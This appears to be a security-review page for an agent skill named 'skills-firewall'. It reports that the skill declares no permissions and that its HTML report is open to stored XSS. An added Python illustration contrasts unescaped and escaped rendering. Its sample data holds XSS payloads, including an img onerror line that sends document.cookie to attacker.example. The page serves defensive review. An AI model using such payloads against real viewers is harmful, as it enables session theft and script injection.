skills-firewall

Security checks across malware telemetry and agentic risk

Overview

This appears to be a local pattern-matching skill scanner, but it presents itself as an enforcing firewall, and its HTML report can render scanned names or fields without escaping them.

Treat this as a lightweight local pattern scanner, not a real firewall. Run it only on specific skill folders, review findings manually, be careful opening HTML reports generated from untrusted skill directories, and do not rely on its block or quarantine labels to stop a risky skill from being installed or run.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (2)

Lp3

Medium
Category: MCP Least Privilege
Confidence: 89%
Finding
The skill documentation describes operational capabilities that include file read/write, network access, and shell execution, but it declares no permissions or constraints. For a security-sensitive skill that scans arbitrary paths and manages allow/block lists, this mismatch reduces transparency and makes it harder for reviewers or enforcement systems to apply least privilege.

Missing User Warnings

Medium
Confidence: 97%
Finding
The HTML report is built by interpolating untrusted fields (skill names, categories, warnings, recommendations) directly into HTML with raw f-strings, without escaping. If a scanned skill places HTML or JavaScript payloads in any of those fields, opening the generated report in a browser can trigger report-based (stored) XSS, running attacker-controlled script in the viewer's browser or misleading analysts by rewriting what the report displays.
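The following is an added illustration of the report-generation flaw and its fix; it is not code from the skills-firewall project. It builds the same kind of findings table with raw f-string interpolation next to a version that escapes every untrusted field, and includes a check a reviewer can run on a generated report. The finding records, field names and the hostile skill name are constructed for the example.

```python
import html

# Constructed sample of what a scanner might collect from a skill directory.
# A malicious skill controls every one of these strings, so any of them can
# carry markup aimed at whoever opens the report.
FIELDS = ("skill", "category", "warning", "recommendation")

SAMPLE_FINDINGS = [
    {
        "skill": "helpful-formatter",
        "category": "Supply Chain",
        "warning": "Unpinned dependency: requests",
        "recommendation": "Pin to an exact version.",
    },
    {
        # Hostile skill name: becomes a live element if interpolated raw.
        "skill": '<img src=x onerror="fetch(\'https://attacker.example/?\'+document.cookie)">',
        "category": "Prompt Injection",
        "warning": "<script>alert(document.domain)</script>",
        "recommendation": "Manual review required.",
    },
]


def render_report_unsafe(findings):
    """Vulnerable pattern: untrusted fields dropped straight into f-strings."""
    rows = []
    for finding in findings:
        cells = "".join(f"<td>{finding[k]}</td>" for k in FIELDS)
        rows.append(f"<tr>{cells}</tr>")
    return "<html><body><table>" + "".join(rows) + "</table></body></html>"


def render_report_safe(findings):
    """Hardened: every untrusted value is HTML-escaped before interpolation.

    html.escape(..., quote=True) also escapes ' and ", so the same helper is
    safe if a value ever ends up inside an attribute. A restrictive CSP in a
    <meta> tag is added as a second layer so that an escaping bug elsewhere
    in the report still cannot run inline script.
    """
    rows = []
    for finding in findings:
        cells = "".join(
            f"<td>{html.escape(str(finding[k]), quote=True)}</td>" for k in FIELDS
        )
        rows.append(f"<tr>{cells}</tr>")
    csp = (
        '<meta http-equiv="Content-Security-Policy" '
        "content=\"default-src 'none'; style-src 'unsafe-inline'\">"
    )
    return f"<html><head>{csp}</head><body><table>{''.join(rows)}</table></body></html>"


def raw_markup_leaked(report, findings):
    """Reviewer check: does any field containing '<' survive verbatim in the report?"""
    return any(
        "<" in str(finding[k]) and str(finding[k]) in report
        for finding in findings
        for k in FIELDS
    )


if __name__ == "__main__":
    print("unsafe leaks raw markup:", raw_markup_leaked(render_report_unsafe(SAMPLE_FINDINGS), SAMPLE_FINDINGS))
    print("safe leaks raw markup:  ", raw_markup_leaked(render_report_safe(SAMPLE_FINDINGS), SAMPLE_FINDINGS))
```

`raw_markup_leaked` is deliberately crude: it only catches a field that survives byte-for-byte, which is exactly the f-string case this finding describes. It will not catch partial escaping or values placed in JavaScript or URL contexts, where `html.escape` alone is not sufficient; those need context-specific encoding or a templating engine with autoescaping.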

VirusTotal

0 of 65 vendors flagged this skill; all 65 reported it clean.